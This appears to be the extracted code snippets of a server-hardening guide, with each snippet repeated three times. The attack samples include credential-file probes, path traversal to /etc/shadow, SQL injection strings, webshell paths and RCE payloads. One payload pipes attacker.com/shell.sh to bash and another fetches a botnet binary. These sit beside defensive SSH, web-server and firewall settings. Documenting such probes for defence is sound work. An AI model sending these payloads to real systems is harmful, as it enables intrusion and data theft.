root
admin
ubuntu
test
oracle
postgres
deploy
git
ftpuser
minecraft
root
admin
ubuntu
test
oracle
postgres
deploy
git
ftpuser
minecraft
root
admin
ubuntu
test
oracle
postgres
deploy
git
ftpuser
minecraft
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin prohibit-password
GET /.env HTTP/1.1
GET /.env.local HTTP/1.1
GET /.env.production HTTP/1.1
GET /.env.backup HTTP/1.1
GET /api/.env HTTP/1.1
GET /app/.env HTTP/1.1
GET /laravel/.env HTTP/1.1
GET /wp-content/.env HTTP/1.1
GET /.env HTTP/1.1
GET /.env.local HTTP/1.1
GET /.env.production HTTP/1.1
GET /.env.backup HTTP/1.1
GET /api/.env HTTP/1.1
GET /app/.env HTTP/1.1
GET /laravel/.env HTTP/1.1
GET /wp-content/.env HTTP/1.1
GET /.env HTTP/1.1
GET /.env.local HTTP/1.1
GET /.env.production HTTP/1.1
GET /.env.backup HTTP/1.1
GET /api/.env HTTP/1.1
GET /app/.env HTTP/1.1
GET /laravel/.env HTTP/1.1
GET /wp-content/.env HTTP/1.1
# Nginx
location ~ /\.env { deny all; return 404;
}
# Nginx
location ~ /\.env { deny all; return 404;
}
# Nginx
location ~ /\.env { deny all; return 404;
}
# Apache
<FilesMatch "^\.env"> Require all denied
</FilesMatch>
# Apache
<FilesMatch "^\.env"> Require all denied
</FilesMatch>
# Apache
<FilesMatch "^\.env"> Require all denied
</FilesMatch>
GET /wp-config.php
GET /.git/config
GET /.git/HEAD
GET /server-status
GET /.htpasswd
GET /web.config
GET /config.php
GET /database.yml
GET /settings.py
GET /wp-config.php
GET /.git/config
GET /.git/HEAD
GET /server-status
GET /.htpasswd
GET /web.config
GET /config.php
GET /database.yml
GET /settings.py
GET /wp-config.php
GET /.git/config
GET /.git/HEAD
GET /server-status
GET /.htpasswd
GET /web.config
GET /config.php
GET /database.yml
GET /settings.py
GET /../../etc/passwd
GET /..%2f..%2f..%2fetc/shadow
GET /static/..%252f..%252f..%252fetc/passwd
GET /images/../../../etc/hostname
GET /../../etc/passwd
GET /..%2f..%2f..%2fetc/shadow
GET /static/..%252f..%252f..%252fetc/passwd
GET /images/../../../etc/hostname
GET /../../etc/passwd
GET /..%2f..%2f..%2fetc/shadow
GET /static/..%252f..%252f..%252fetc/passwd
GET /images/../../../etc/hostname
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write &country=$(curl+attacker.com/shell.sh|bash) POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php GET /index.php?s=/index/\think\app/invokefunction &function=call_user_func_array&vars[0]=shell_exec &vars[1][]=whoami GET /?cmd=wget+http://185.x.x.x/bins/bot.arm7
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write &country=$(curl+attacker.com/shell.sh|bash) POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php GET /index.php?s=/index/\think\app/invokefunction &function=call_user_func_array&vars[0]=shell_exec &vars[1][]=whoami GET /?cmd=wget+http://185.x.x.x/bins/bot.arm7
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write &country=$(curl+attacker.com/shell.sh|bash) POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php GET /index.php?s=/index/\think\app/invokefunction &function=call_user_func_array&vars[0]=shell_exec &vars[1][]=whoami GET /?cmd=wget+http://185.x.x.x/bins/bot.arm7
GET /c99.php
GET /r57.php
GET /shell.php
GET /cmd.php
GET /webshell.php
GET /wp-content/uploads/shell.php
GET /c99.php
GET /r57.php
GET /shell.php
GET /cmd.php
GET /webshell.php
GET /wp-content/uploads/shell.php
GET /c99.php
GET /r57.php
GET /shell.php
GET /cmd.php
GET /webshell.php
GET /wp-content/uploads/shell.php
sqlmap/1.7
Nuclei - Open-source project (projectdiscovery.io)
Nmap Scripting Engine
masscan/1.3
Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2)
sqlmap/1.7
Nuclei - Open-source project (projectdiscovery.io)
Nmap Scripting Engine
masscan/1.3
Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2)
sqlmap/1.7
Nuclei - Open-source project (projectdiscovery.io)
Nmap Scripting Engine
masscan/1.3
Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2)
GET /index.php?id=1'+UNION+SELECT+username,password+FROM+users--
GET /search?q=1%27%20OR%201=1--
GET /index.php?id=1'+UNION+SELECT+username,password+FROM+users--
GET /search?q=1%27%20OR%201=1--
GET /index.php?id=1'+UNION+SELECT+username,password+FROM+users--
GET /search?q=1%27%20OR%201=1--
sed -i 's/#*PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
systemctl restart sshd
sed -i 's/#*PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
systemctl restart sshd
sed -i 's/#*PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
systemctl restart sshd
# Nginx — add to every server block
location ~ /\.(env|git|htpasswd) { deny all; return 404;
}
# Nginx — add to every server block
location ~ /\.(env|git|htpasswd) { deny all; return 404;
}
# Nginx — add to every server block
location ~ /\.(env|git|htpasswd) { deny all; return 404;
}
ufw default deny incoming
ufw allow ssh
ufw allow http
ufw allow https
ufw enable
ufw default deny incoming
ufw allow ssh
ufw allow http
ufw allow https
ufw enable
ufw default deny incoming
ufw allow ssh
ufw allow http
ufw allow https
ufw enable
apt update && apt upgrade -y
# Or enable unattended-upgrades for security patches
apt update && apt upgrade -y
# Or enable unattended-upgrades for security patches
apt update && apt upgrade -y
# Or enable unattended-upgrades for security patches
grep "Failed password" /var/log/auth.log | tail -20
grep "Failed password" /var/log/auth.log | tail -20
grep "Failed password" /var/log/auth.log | tail -20
curl -fsSL https://defensia.cloud/install.sh | sudo bash -s -- --token <YOUR_TOKEN>
curl -fsSL https://defensia.cloud/install.sh | sudo bash -s -- --token <YOUR_TOKEN>
curl -fsSL https://defensia.cloud/install.sh | sudo bash -s -- --token <YOUR_TOKEN> - PHPUnit eval-stdin.php — a dev dependency that should never be on production. If it's accessible, they have full shell access.
- ThinkPHP RCE — affects ThinkPHP < 5.0.24. Allows arbitrary command execution via URL.
- Luci router RCE — targets OpenWrt/router admin panels exposed to the internet.
- Direct wget — tries to download and execute a botnet binary. bot.arm7 tells you they're targeting IoT devices too.